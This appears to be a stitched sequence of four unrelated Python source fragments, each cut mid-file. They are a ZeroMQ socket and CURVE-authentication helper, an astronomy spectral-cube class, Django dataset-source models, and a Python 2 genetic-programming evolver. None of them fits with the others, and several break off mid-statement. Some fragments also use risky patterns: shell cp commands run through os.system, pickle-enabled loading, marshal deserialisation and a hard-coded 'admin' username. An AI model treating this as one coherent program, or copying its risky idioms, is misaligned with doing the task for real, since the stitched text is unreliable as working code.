server_secret_file
)
except OSError as e:
self.log.error(
"Failed to load certificates: %s, Configuration: %s",
str(e),
vars(self.args),
)
raise SystemExit("Failed to load certificates")
else:
bind.curve_secretkey = server_secret
bind.curve_publickey = server_public
bind.curve_server = True # Enable curve authentication
bind.bind(
"{connection}:{port}".format(
connection=connection,
port=port,
)
)
if socket_type not in [zmq.PUB]:
self.poller.register(bind, poller_type)
return bind
def _socket_connect(self, socket_type, connection, port, poller_type=None):
"""Return a socket object which has been bound to a given address.
> A connection back to the server will wait 10 seconds for an ack
before going into a retry loop. This is done to forcefully cycle
the connection object to reset.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:param connection: Set the Address information used for the bound
socket.
:type connection: String
:param port: Define the port which the socket will be bound to.
:type port: Integer
:param poller_type: Set the Socket type, typically defined using a ZMQ
constant.
:type poller_type: Integer
:returns: Object
"""
if poller_type is None:
poller_type = zmq.POLLIN
bind = self._socket_context(socket_type=socket_type)
if self.args.zmq_shared_key:
bind.plain_username = b"admin" # User is hard coded.
bind.plain_password = self.args.zmq_shared_key.encode()
self.log.info("Shared key authentication enabled.")
elif self.args.zmq_curve_encryption:
client_secret_file = os.path.join(
self.secret_keys_dir, "client.key_secret"
)
server_public_file = os.path.join(
self.public_keys_dir, "server.key"
)
for item in [
self.public_keys_dir,
self.secret_keys_dir,
client_secret_file,
server_public_file,
]:
if not os.path.exists(item):
raise SystemExit(
"The required path [ {} ] does not exist. Have"
" you generated your keys?".format(item)
)
try:
client_public, client_secret = zmq_auth.load_certificate(
client_secret_file
)
server_public, _ = zmq_auth.load_certificate(
server_public_file
)
except OSError as e:
self.log.error(
"Error while loading certificates: %s. Configuration: %s",
str(e),
vars(self.args),
)
raise SystemExit("Failed to load keys.")
else:
bind.curve_secretkey = client_secret
bind.curve_publickey = client_public
bind.curve_serverkey = server_public
if socket_type == zmq.SUB:
bind.setsockopt_string(zmq.SUBSCRIBE, self.identity)
else:
bind.setsockopt_string(zmq.IDENTITY, self.identity)
self.poller.register(bind, poller_type)
bind.connect(
"{connection}:{port}".format(
connection=connection,
port=port,
)
)
self.log.info("Socket connected to [ %s ].", connection)
return bind
def _socket_context(self, socket_type):
"""Create socket context and return a bind object.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:returns: Object
"""
bind = self.ctx.socket(socket_type)
hwm = int(self.hwm * 4)
try:
bind.sndhwm = bind.rcvhwm = hwm
except AttributeError:
bind.hwm = hwm
bind.set_hwm(hwm)
bind.setsockopt(zmq.SNDHWM, hwm)
bind.setsockopt(zmq.RCVHWM, hwm)
if socket_type == zmq.ROUTER:
bind.setsockopt(zmq.ROUTER_MANDATORY, 1)
return bind
@staticmethod
def _socket_recv(socket, nonblocking=False):
"""Receive a message over a ZM0 socket.
The message specification for server is as follows.
[
b"Identity"
b"ID",
b"ASCII Control Characters",
b"command",
b"data",
b"info",
b"stderr",
b"stdout",
]
The message specification for client is as follows.
[
b"ID",
b"ASCII Control Characters",
b"command",
b"data",
b"info",
b"stderr",
b"stdout",
]
All message parts are | |
store some metadata
self.meta['width'] = self.width
self.meta['target'] = self.obs.target.name
self.meta['night'] = self.obs.night.name
self.meta['instrument'] = self.obs.instrument.name
self.meta['extractiondefaults'] = self.obs.instrument.extractiondefaults
#if self.shift:
# raise ValueError("You need to store the shifts and stretches in the cube!")
self.speak("Done loading spectral cube.")
#self.markBad()
self.save()
# keep - save the entire cube to a single file
def save(self):
self.speak('attempting to save the cube of loaded, shifted, compiled spectra to {0}'.format(self.filename))
tosave = {}
for thing in self.savable:
tosave[thing] = self.__dict__[thing]
self.speak(' including [{0}] in the saved cube structure'.format(thing))
np.save(self.filename, tosave)
# keep - load the entire cube from a single file
def load(self):
self.speak('attempting to load previously saved cubes from...')
self.speak('{0}'.format(self.filename))
loaded = np.load(self.filename, allow_pickle=True)[()]
for thing in self.savable:
self.__dict__[thing] = loaded[thing]
self.speak(' loading [{0}] from the saved cube structure'.format(thing))
self.numberofstars = len(self.stellar['aperture'])
self.numberofwavelengths = len(self.spectral['wavelength'])
self.numberoftimes = len(self.temporal)
# keep - automated tool to package this observation into a nice directory
def packageandexport(self):
'''make a tidy package that contains necessary information for sending to someone else'''
# create a directory for this packaged cube to land
base = self.obs.reducer.extractionDirectory
toexport = os.path.join(base, 'cube_' + self.meta['target'] + '_' + self.meta['night'])
mkdir(toexport)
commandstorun = []
# copy the cube npy file
commandstorun.append('cp {} {}/.'.format(self.filename, toexport))
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(os.path.join(base, 'genericfinderchart.pdf'), toexport))
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(os.path.join(base,'extractionCenters.txt'), toexport))
# loop over the star directories
for s in self.stars:
stardir = os.path.join(toexport, s)
mkdir(stardir)
pdfs = glob.glob(os.path.join(base, s, '*aperture*.pdf'))
for p in pdfs:
# copy the finder chart
commandstorun.append('cp {} {}/.'.format(p, stardir))
apertureimage = os.path.join(base, s, 'animatedextraction/formovie_00000.png')
commandstorun.append('cp {} {}/{}_whichaperture.png'.format(apertureimage, stardir, s))
for c in commandstorun:
print(c)
os.system(c)
@property
def cubeMegaComparison(self):
'''
Return a fake cube entry for an combined mega-comparison star.
'''
if len(self.comparisons) == 1:
d = {}
star = self.comparisons[0]
for key in self.cubes.keys():
d[key] = self.cubes[key][star]
return d
else:
raise NameError("Darn it -- the mega-comparison hasn't been implemented yet!")
# keep - makes tidy image plots of spectral quantities
def imageCube(self, keys=None, stars=None, remake=False):
'''
Show an imshow of every cube key.
'''
if keys == None:
keys = self.cubekeys
if stars == None:
stars = self.stars
# we'll plot various types of images
options = {
'basic':'Raw Extracted Quantities',
'wavelength':'Wavelength-normalized Quantities',
'comparison':'Comparison-divided Quantities'
}
dir = os.path.join(self.directory, 'imagedcubes')
mkdir(dir)
for option, description in options.items():
filename = os.path.join(dir, '{}+{}+{}+{}.pdf'.format(option, {True:'shifted', False:'raw'}[self.shift], '-'.join(keys), '+'.join(stars)))
if os.path.exists(filename) and (remake == False):
self.speak('{} already exists'.format(filename))
#assert(False)
continue
nrows = len(keys)
ncols = len(stars)
fi, ax = plt.subplots(nrows, ncols,
sharex=True, sharey=True, figsize=(12,8),
gridspec_kw=dict(hspace=0.1, wspace=0.02))
plt.suptitle('{}, [width={}], [{}shifted]\n{}'.format(description, self.widthkey, {True:'', False:'un'}[self.shift], self.obs))
w = self.spectral['wavelength']
t = np.arange(self.numberoftimes)
# set up the imshow parameters
imkw = dict(
extent = [np.min(w), np.max(w), np.min(t), np.max(t)],
cmap = 'gray',
interpolation='nearest',
aspect = 'auto',
origin = 'lower'
)
# is this just a single panel?
single = len(keys)*len(stars) == 1
for i, key in enumerate(keys):
for j, star in enumerate(stars):
if single:
a = ax
else:
a = ax[i,j]
a.cla()
if option == 'basic':
# don't modify the measurements at all
self.speak('displaying the raw measurements for {}'.format(key))
z = self.cubes[key][star]
vmin, vmax = np.min(z), np.max(z)
if option == 'wavelength':
# normalize along the wavelength axis
self.speak('displaying the measurements normalized by their median spectrum for {}'.format(key))
z = self.cubes[key][star]
oned = np.median(z, 0)
z = z/oned[np.newaxis,:]
vmin, vmax = 0.8, 1.2
if option == 'comparison':
# divide by the comparison star[s]
self.speak('displaying the measurements divided by the comparison[s] for {}'.format(key))
target = self.cubes[key][star]
comparison = self.cubeMegaComparison[key]
z = target/comparison
oned = np.median(z, 0)
z = z/oned[np.newaxis,:]
vmin, vmax = 0.98, 1.02
#vmin, vmax = np.percentile(z, [1,99])
self.speak('the limits for {} on {} are [{} to {}]'.format(key, star, vmin, vmax))
#self.input('are these OK?')
a.imshow(z, vmin=vmin, vmax=vmax, **imkw)
# fuss with the axis labels
if j == 0:
a.set_ylabel('{}\n(timepoints)'.format(key))
else:
plt.setp(a.get_yticklabels(), visible=False)
if i == 0:
a.set_title('{}'.format(star))
if i == (len(self.cubekeys)-1):
a.set_xlabel('Wavelength (angstroms)')
else:
plt.setp(a.get_xticklabels(), visible=False)
plt.draw()
plt.savefig(filename, dpi=600)
self.speak('saved image of this cube to {}'.format(filename))
"""
I merged Hannah's algorithm into "determineStretches"
def nudgeWavelengths(self):
'''
This function loops through the extracted*.npy files
and determines corrected wavelength solutions that will match up
their lines. It writes a new array of wavelengths for each,
into a file that aligns with the original extracted file.
(Can be run before an unshifted cube is populated.)
The code for this was developed by <NAME>.
'''
def align_lines(stars, line_range, offset, line_pos, line_poses, plot=False):
'''
This function takes
stars: the extracted*.npy file
line_range: the pre-determined fixed alignment range for a given feature to use for the alignment
offset: how many angstroms to shift over when performing the cross-correlation of a given feature in a spectrum
line_pos: a list that this function will append values to; amount of shift in wavelength space for each star width
line_poses: a list of line_pos lists; amount of shifts in wavelength space for each star with all its widths
plot: do you want plots to pop up? (T/F)
This code assumes that the stellar spectra may shift slowly throughout the night but do not suddenly jump around from one exposure to the next.
'''
#### ZKBT: pulling out starmaster from the end of stars?
starmaster = stars[-1]
# find the wavelengths between the wavelength range of the feature for the master star
idxmaster = (starmaster['wavelength']>=line_range[0])*(starmaster['wavelength']<=line_range[1])
# get the corresponding values from raw_counts; this will be the main thing to correlate against
corrmaster = starmaster[width]['raw_counts'][idxmaster]
####### KLUDGE?????
# corrmaster = craftroom.oned.subtractContinuum(corrmaster, n=2) + 0.0
# this is where the "true" value of the line is; i.e., the reference position on the master spectrum
line = starmaster['wavelength'][idxmaster][0]
# where that line falls in pixel space; uses the wavelength solution from mosasaurus
linepx = np.interp(line, starmaster['wavelength'], starmaster['w'])
# list of stars is the stars from "aperture" in mosasaurus, plus the master star appended at the end
for s in range(len(stars)):
if (plot) and (s != (len(stars)-1)): self.speak('checking correlations for {}'.format(self.stars[s]))
# find the wavelengths between the wavelenth range of the feature for this particular star
idxstar = (stars[s]['wavelength']>=line_range[0])*(stars[s]['wavelength']<=line_range[1])
# this is the spectrum of the star that you want to correlate to the master
corrstar = stars[s][width]['raw_counts']
####### KLUDGE?????
# corrstar = craftroom.oned.subtractContinuum(corrstar) + 0.0
# need to know now many wavelengths are being covered
arraylen = len(np.where(idxmaster)[0])
# this is the pixel where we will start the shift
initpx = np.where(idxstar)[0][0] - offset
#if corrstar[initpx] == 0.0:
# initpx = np.where(corrstar != 0.)[0][0]
# corrmaster = wavemaster[initpx+offset:initpx+offset+arraylen]
# empty lists for the correlation coeffients and the actual pixel shifts
corrs, shifts = [], []
# set the number of shifts you will try in the cross correlation; the finer the shift the more accurate everything will be but it will take longer
for shift in np.linspace(0, arraylen+offset, (arraylen+offset)*10+1):
# this is to make sure we're not losing counts at the ends of pixels when we're shifting by sub-pixels
newbit = shift%1
therest = 1 - newbit
startpx = int(np.floor(shift))
# create the array at the sub-pixel level that will be compared to the master star feature
corrarray = corrstar[initpx+startpx : initpx+startpx+arraylen]*therest + corrstar[initpx+startpx+1 : initpx+startpx+arraylen+1]*newbit
#if shift == 0:
# plt.plot(corrmaster)
# plt.plot(corrarray)
# plt.show()
corrs.append(np.corrcoef(corrmaster, corrarray)[0,1])
shifts.append(corrarray)
if plot == True and (s != len(stars)-1):
# can inspect where the code thinks the peak of the correlation is (careful! it doesn't always pick the right one!)
#print('1st corr')
color = self.starcolor(self.stars[s])
plt.plot(corrs, color=color)
plt.axvline(np.where(corrs == np.max(corrs))[0], color=color)
plt.title(str(line_range))
plt.xlim(0,400)
#plt.draw()
#plt.show()
#a = input('hmmm?')
# try a shift based on the correlation coefficients
# this first try may be wrong so we have to compare to past shifts
firstshiftind = np.where(corrs == np.max(corrs))[0][0]
firstrange = np.linspace(0, arraylen+offset, (arraylen+offset)*10+1)
firstshift = firstrange[firstshiftind]
# offset should be reasonably small since we assume the spectral features do not suddenly jump around from one exposure to | |
the admin.
"""
objects = DataCutDatasetManager()
class Meta:
proxy = True
verbose_name = "Data Cut Dataset"
permissions = [
(
"manage_unpublished_datacut_datasets",
"Manage (create, view, edit) unpublished datacut datasets",
)
]
class DataCutDatasetUserPermission(DataSetUserPermission):
"""
Proxy model to allow for separate admin pages for master and data cut datasets
"""
class Meta:
proxy = True
class ReferenceNumberedDatasetSource(TimeStampedModel):
"""
Abstract model that adds a reference number to a dataset source model.
"""
dataset = models.ForeignKey(DataSet, on_delete=models.CASCADE)
reference_number = models.IntegerField(null=True)
class Meta:
abstract = True
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# If a reference code is set on the dataset, add a reference number to this source
# by incrementing the counter on the reference code model
if self.reference_number is None and self.dataset.reference_code is not None:
self.reference_number = self.dataset.reference_code.get_next_reference_number()
# If the dataset's reference code was unset, unset this source's reference number
elif self.reference_number is not None and self.dataset.reference_code is None:
self.reference_number = None
super().save(force_insert, force_update, using, update_fields)
@property
def source_reference(self):
if self.dataset.reference_code is not None and self.reference_number is not None:
return "".join(
[
self.dataset.reference_code.code.upper(),
str(self.reference_number).zfill(5),
]
)
return None
def get_filename(self, extension=".csv"):
filename = slugify(self.name) + extension # pylint: disable=no-member
if self.source_reference is not None:
return f"{self.source_reference}-{filename}"
return filename
class BaseSource(ReferenceNumberedDatasetSource):
FREQ_DAILY = 1
FREQ_WEEKLY = 2
FREQ_MONTHLY = 3
FREQ_QUARTERLY = 4
FREQ_ANNUALLY = 5
FREQ_6_MONTHLY = 6
FREQ_ADHOC = 7
_FREQ_CHOICES = (
(FREQ_DAILY, "Daily"),
(FREQ_WEEKLY, "Weekly"),
(FREQ_MONTHLY, "Monthly"),
(FREQ_QUARTERLY, "Quarterly"),
(FREQ_6_MONTHLY, "6-monthly"),
(FREQ_ANNUALLY, "Annually"),
(FREQ_ADHOC, "Ad hoc"),
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(
max_length=1024,
blank=False,
help_text="Used as the displayed text in the download link",
)
database = models.ForeignKey(Database, default=None, on_delete=models.CASCADE)
schema = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
default="public",
)
frequency = models.IntegerField(choices=_FREQ_CHOICES, default=FREQ_DAILY)
class Meta:
abstract = True
def __str__(self):
return self.name
class SourceTable(BaseSource):
table = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
dataset_finder_opted_in = models.BooleanField(
default=False,
null=False,
verbose_name="IAM/IAO opt-in for Dataset Finder",
help_text=(
"Should this dataset be discoverable through Dataset Finder for all users, "
"even if they haven’t been explicitly granted access?"
),
)
data_grid_enabled = models.BooleanField(
default=True,
help_text="Allow users to filter, sort and export data from within the browser",
)
data_grid_download_enabled = models.BooleanField(
default=False,
help_text="Allow users to download from the data grid (requires a download limit)",
)
data_grid_download_limit = models.IntegerField(
null=True,
blank=True,
help_text=(
"Set the maximum number of records that can be downloaded from the data grid "
"(required if data grid download is enabled)"
),
)
class Meta:
db_table = "app_sourcetable"
def __str__(self):
return f"{self.name} ({self.id})"
def can_show_link_for_user(self, user):
return False
@property
def type(self):
return DataLinkType.SOURCE_TABLE
def get_data_last_updated_date(self):
return get_earliest_tables_last_updated_date(
self.database.memorable_name, ((self.schema, self.table),)
)
def get_grid_data_url(self):
return reverse("datasets:source_table_data", args=(self.dataset_id, self.id))
def get_data_grid_query(self):
return sql.SQL("SELECT * from {}.{}").format(
sql.Identifier(self.schema), sql.Identifier(self.table)
)
def get_column_config(self):
"""
Return column configuration for the source table in the format expected by ag-grid.
"""
col_defs = []
for column in datasets_db.get_columns(
self.database.memorable_name,
schema=self.schema,
table=self.table,
include_types=True,
):
col_defs.append(
{
"field": column[0],
"filter": True,
"sortable": True,
"dataType": GRID_DATA_TYPE_MAP.get(column[1], column[1]),
}
)
return col_defs
def get_column_details_url(self):
return reverse(
"datasets:source_table_column_details",
args=(self.dataset_id, self.id),
)
def get_chart_builder_url(self):
return reverse(
"charts:create-chart-from-source-table",
args=(self.id,),
)
def get_chart_builder_query(self):
return f"SELECT * from {self.schema}.{self.table}"
def get_previous_uploads(self):
return UploadedTable.objects.filter(schema=self.schema, table_name=self.table).order_by(
"-data_flow_execution_date"
)
class SourceTableFieldDefinition(models.Model):
field = models.CharField(
max_length=63,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
description = models.CharField(
max_length=1024,
blank=True,
null=True,
)
source_table = models.ForeignKey(
SourceTable, on_delete=models.CASCADE, related_name="field_definitions"
)
class SourceView(BaseSource):
view = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
def get_absolute_url(self):
return reverse("datasets:dataset_source_view_download", args=(self.dataset.id, self.id))
def can_show_link_for_user(self, user):
return True
@property
def type(self):
return DataLinkType.SOURCE_VIEW
class SourceLink(ReferenceNumberedDatasetSource):
TYPE_EXTERNAL = 1
TYPE_LOCAL = 2
_LINK_TYPES = ((TYPE_EXTERNAL, "External Link"), (TYPE_LOCAL, "Local Link"))
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
link_type = models.IntegerField(choices=_LINK_TYPES, default=TYPE_EXTERNAL)
name = models.CharField(
blank=False,
null=False,
max_length=128,
help_text="Used as the displayed text in the download link",
)
url = models.CharField(max_length=256)
format = models.CharField(blank=False, null=False, max_length=10)
frequency = models.CharField(blank=False, null=False, max_length=50)
class Meta:
db_table = "app_sourcelink"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Stash the current link type so it can be compared on save
self._original_url = self.url
def __str__(self):
return self.name
def _is_s3_link(self):
return self.url.startswith("s3://")
def get_frequency_display(self):
return self.frequency
def local_file_is_accessible(self):
"""
Check whether we can access the file on s3
:return:
"""
client = get_s3_client()
try:
client.head_object(Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url)
except ClientError:
return False
return True
def _delete_s3_file(self):
if self.url.startswith("s3://sourcelink") and self.local_file_is_accessible():
client = get_s3_client()
client.delete_object(Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url)
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# Allow users to change a url from local to external and vice versa
is_s3_link = self._is_s3_link()
was_s3_link = self._original_url.startswith("s3://")
if self.id is not None and self._original_url != self.url:
self.link_type = self.TYPE_LOCAL if is_s3_link else self.TYPE_EXTERNAL
super().save(force_insert, force_update, using, update_fields)
# If the link is no longer an s3 link delete the file
if was_s3_link and not is_s3_link:
self._delete_s3_file()
def delete(self, using=None, keep_parents=False):
if self.link_type == self.TYPE_LOCAL:
self._delete_s3_file()
super().delete(using, keep_parents)
def get_absolute_url(self):
return reverse("datasets:dataset_source_link_download", args=(self.dataset_id, self.id))
def get_preview_url(self):
return reverse("datasets:data_cut_source_link_preview", args=(self.dataset_id, self.id))
def show_column_filter(self):
# this will be enabled in subsequent PR
return False
def can_show_link_for_user(self, user):
return True
def get_filename(self): # pylint: disable=arguments-differ
if self.link_type == self.TYPE_LOCAL:
native_extension = os.path.splitext(self.url)[1]
extension = native_extension if native_extension else ".csv"
return super().get_filename(extension=extension)
return super().get_filename()
@property
def type(self):
return DataLinkType.SOURCE_LINK
def get_data_last_updated_date(self):
if self.link_type == self.TYPE_LOCAL:
try:
metadata = get_s3_client().head_object(
Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url
)
return metadata.get("LastModified")
except ClientError:
pass
return None
def user_can_preview(self, user):
return self.dataset.user_has_access(user)
def get_preview_data(self):
"""
Returns column names and preview data for an s3 hosted csv.
"""
if (
not self._is_s3_link()
or not self.local_file_is_accessible()
or not self.url.endswith(".csv")
):
return None, []
client = get_s3_client()
# Only read a maximum of 100Kb in for preview purposes. This should stop us getting
# denial-of-service'd by files with a massive amount of data in the first few columns
file = client.get_object(
Bucket=settings.AWS_UPLOADS_BUCKET, Key=self.url, Range="bytes=0-102400"
)
head = file["Body"].read().decode("utf-8")
# Drop anything after the rightmost newline in case we only got a partial row
head = head[: head.rindex("\n") + 1]
csv_data = head.splitlines()
del csv_data[settings.DATASET_PREVIEW_NUM_OF_ROWS :]
fh = StringIO("\n".join(csv_data))
reader = csv.DictReader(fh)
records = []
for row in reader:
records.append(row)
if len(records) >= settings.DATASET_PREVIEW_NUM_OF_ROWS:
break
return reader.fieldnames, records
class CustomDatasetQuery(ReferenceNumberedDatasetSource):
FREQ_DAILY = 1
FREQ_WEEKLY = 2
FREQ_MONTHLY = 3
FREQ_QUARTERLY = 4
FREQ_ANNUALLY = 5
_FREQ_CHOICES = (
(FREQ_DAILY, "Daily"),
(FREQ_WEEKLY, "Weekly"),
(FREQ_MONTHLY, "Monthly"),
(FREQ_QUARTERLY, "Quarterly"),
(FREQ_ANNUALLY, "Annually"),
)
name = models.CharField(max_length=255)
database = models.ForeignKey(Database, on_delete=models.CASCADE)
query = models.TextField()
frequency = models.IntegerField(choices=_FREQ_CHOICES)
reviewed = models.BooleanField(default=False)
data_grid_enabled = models.BooleanField(
default=False,
help_text="Allow users to filter, sort and export data from within the browser",
)
class Meta:
verbose_name = "SQL Query"
verbose_name_plural = "SQL Queries"
def __str__(self):
return f"{self.dataset.name}: {self.name}"
def get_absolute_url(self):
return reverse("datasets:dataset_query_download", args=(self.dataset_id, self.id))
def get_preview_url(self):
return reverse("datasets:data_cut_query_preview", args=(self.dataset_id, self.id))
def show_column_filter(self):
return True
def can_show_link_for_user(self, user):
if user.is_superuser:
return True
return self.reviewed
@property
def type(self):
return DataLinkType.CUSTOM_QUERY
def get_data_last_updated_date(self):
tables = CustomDatasetQueryTable.objects.filter(query=self)
if tables:
return get_earliest_tables_last_updated_date(
self.database.memorable_name,
tuple((table.schema, table.table) for table in tables),
)
return None
def user_can_preview(self, user):
return self.dataset.user_has_access(user) and (self.reviewed or user.is_superuser)
def get_preview_data(self):
from dataworkspace.apps.core.utils import ( # pylint: disable=cyclic-import,import-outside-toplevel
get_random_data_sample,
)
database_name = self.database.memorable_name
columns = datasets_db.get_columns(database_name, query=self.query)
records = []
sample_size = settings.DATASET_PREVIEW_NUM_OF_ROWS
if columns:
rows = get_random_data_sample(
self.database.memorable_name,
sql.SQL(self.query),
sample_size,
)
for row in rows:
record_data = {}
for i, column in enumerate(columns):
record_data[column] = row[i]
records.append(record_data)
return columns, records
def get_grid_data_url(self):
return reverse("datasets:custom_dataset_query_data", args=(self.dataset_id, self.id))
@property
def cleaned_query(self):
# Replace any single '%' with '%%'
return re.sub("(?<!%)%(?!%)", "%%", self.query).rstrip().rstrip(";")
def get_data_grid_query(self):
return sql.SQL(self.cleaned_query)
def get_column_config(self):
"""
Return column configuration for the query in the format expected by ag-grid.
"""
col_defs = []
for column in datasets_db.get_columns(
self.database.memorable_name,
query=self.cleaned_query,
include_types=True,
):
col_defs.append(
{
"field": column[0],
"filter": True,
"sortable": True,
"dataType": GRID_DATA_TYPE_MAP.get(column[1], column[1]),
}
)
return col_defs
@property
def data_grid_download_enabled(self):
return True
@property
def data_grid_download_limit(self):
return None
def get_column_details_url(self):
return reverse(
"datasets:custom_query_column_details",
args=(self.dataset_id, self.id),
)
def get_chart_builder_url(self):
return reverse(
"charts:create-chart-from-data-cut-query",
args=(self.id,),
)
def get_chart_builder_query(self):
return self.query
class CustomDatasetQueryTable(models.Model):
query = models.ForeignKey(CustomDatasetQuery, on_delete=models.CASCADE, related_name="tables")
table = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
schema = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
default="public",
)
class ReferenceDataset(DeletableTimestampedUserModel):
SORT_DIR_ASC = 1
SORT_DIR_DESC = 2
_SORT_DIR_CHOICES = ((SORT_DIR_ASC, "Ascending"), (SORT_DIR_DESC, "Descending"))
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
| |
<filename>src/evolver.py
"""
evolver
=======
This module contains the methods to start and finish a complete evolutionary run.
The present version can run strongly-typed Koza-based GP using tournament
selection.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@author: by <NAME>
@version: 1.00
@copyright: (c) 2009 <NAME> under the mit license
http://www.opensource.org/licenses/mit-license.html
@contact: <EMAIL>
"""
import settings
import timeit
import selection
import buildtree
import cPickle
import marshal
import pprint
#import shelve
import evalfitness
#from pysqlite2 import dbapi2 as sqlite
from sqlite3 import dbapi2 as sqlite
import crossutil
import math
import writepop
import copy
import mutation
#import psyco
import crossover
import os
#psyco.profile()
# Exceptions related to operator probability
class CrossoverProbError(Exception): pass
class MutationProbError(Exception): pass
class OperatorProbError(Exception): pass
# Exceptions related to population size
class PopSizeError(Exception): pass
def EvolutionRun(popsize,root_node,mindepth,maxdepth,buildmethod,max_nb_runs, fitness_criterion ,crossover_prob,mutation_prob,size, prob_selection,dbname,verbose):
"""
Function: EvolutionRun
=======================
The highest level function of the package.
It starts an evolutionary run with given parameters,and gives indications of
what is found after each generation.
@param popsize: size of the population
root_node: specify the root node and its arity (nb of children). e.g. (0,2,'root')
@param mindepth: min tree depth (at the moment only 2 working)
@param maxdepth: max depth of trees in new generation (should be >=3)
@param buildmethod: which Koza method is used to build the trees (either
'AddHalfNode' or 'AddFullNode' or 'AddGrowNodeMin' respectively for
Ramped Half-n-Half, Full, or Half)
@param max_nb_runs: the search will gon on until a maximum number of generations
is reached
@param fitness_criterion: the search will stop if the fitness found is <= to
the ideal fitness
@param crossover_prob: probability of crossover (will determine what proportion of
the population will be replaced by crossover-generated offsprings)
@param mutation_prob: probability of crossover (will determine what proportion of
the population will be replaced by mutation-generated offsprings)
@param dbname: path to database e.g. r'D:\3d_work\pythongp\pySTGP_0.51\src\pop_db'
@param verbose: print the best tree of each generation
"""
try:
os.remove(dbname)
except:
pass
current_best_fitness=float('inf')
tablenames=[]
#build the intial population of random trees at generation 0
tablenames.append('tab0')
writepop.WriteInitialPopulation2DB(popsize,root_node,mindepth,maxdepth,buildmethod,dbname,tablenames[0])
# get best fitness
db_list=selection.GetDBKeysAndFitness(dbname,tablenames[0])
chosen_one=selection.SelectDBOneFittest(db_list)
current_best_fitness=chosen_one[1]
print ''.join(['generation 0 (db table name = tab0): -> best fit individual has id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
if verbose==True:
#writepop.GetPopStatFromDB(dbname,tablenames[0])
con = sqlite.connect(dbname)
SELECT = "select tree from %s where o_id=%d" % (tablenames[0],chosen_one[0])
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
con.close()
best_tree=copy.deepcopy(marshal.loads(myresult[0]))
print best_tree
if current_best_fitness<=fitness_criterion:
print ''.join(['found solution: generation 0, db_id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
else:
# evolve the population for max_nb_runs
i=1
while i<max_nb_runs and current_best_fitness>fitness_criterion:
tablenames.append(''.join(['tab',`i`]))
TournamentSelectionEvolveDBPopulation2(popsize,maxdepth,crossover_prob,mutation_prob,size, prob_selection,dbname,tablenames[i-1],tablenames[i])
db_list=selection.GetDBKeysAndFitness(dbname,tablenames[i])
chosen_one=selection.SelectDBOneFittest(db_list)
current_best_fitness=chosen_one[1]
print ''.join(['generation ',`i`,' (db table name = tab',`i`,'): -> best fit individual has id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
if verbose==True:
#writepop.GetPopStatFromDB(dbname,tablenames[i])
con = sqlite.connect(dbname)
SELECT = "select tree from %s where o_id=%d" % (tablenames[i],chosen_one[0])
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
con.close()
best_tree=copy.deepcopy(marshal.loads(myresult[0]))
print best_tree
i=i+1
else:
if current_best_fitness<=fitness_criterion:
print ''.join(['found solution at generation ',`i-1`,', with fitness:',`current_best_fitness`])
writepop.PrintPopFromDB(dbname,tablenames[i-1],'lastpop')
else:
print ''.join(['Fitness stopping criterion not found. Run ended at generation ',`i`])
def TournamentSelectionEvolveDBPopulation2(popsize,maxdepth,crossover_prob,mutation_prob,size, prob_selection,dbname,tablename,tablename2):
"""
Function: TournamentSelectionEvolveDBPopulation2
=================================================
create a new population of randomly generated trees and write this new generation
to a new table of name 'tab'+generation number in the database.
@param popsize: size of the population
@param maxdepth: max depth of trees in new generation
@param crossover_prob: probability of crossover (will determine what proportion of
the population will be replaced by crossover-generated offsprings)
@param mutation_prob: probability of crossover (will determine what proportion of
the population will be replaced by mutation-generated offsprings)
@param dbname: path to database e.g. r'D:\3d_work\pythongp\pySTGP_0.51\src\pop_db'
@param tablename: name of the database table of the initial population
@param tablename2: name of the database table of the next generation
"""
if crossover_prob>1 or crossover_prob<0:
raise CrossoverProbError, "Crossover Probability should be in interval [0,1]"
exit
if mutation_prob>1 or mutation_prob<0:
raise MutationProbError, "Crossover Probability should be in interval [0,1]"
exit
reproduction_prob= 1-(crossover_prob+mutation_prob)
if reproduction_prob>1 or reproduction_prob<0:
raise OperatorProbError, "Sum of Mutation and Crossover Probability should be in interval [0,1]"
exit
if popsize<3:
raise PopSizeError, "The size of the population must be at least 3"
exit
new_pop=[]
trees=[]
# build the appropriate size for the crossover offsprings,
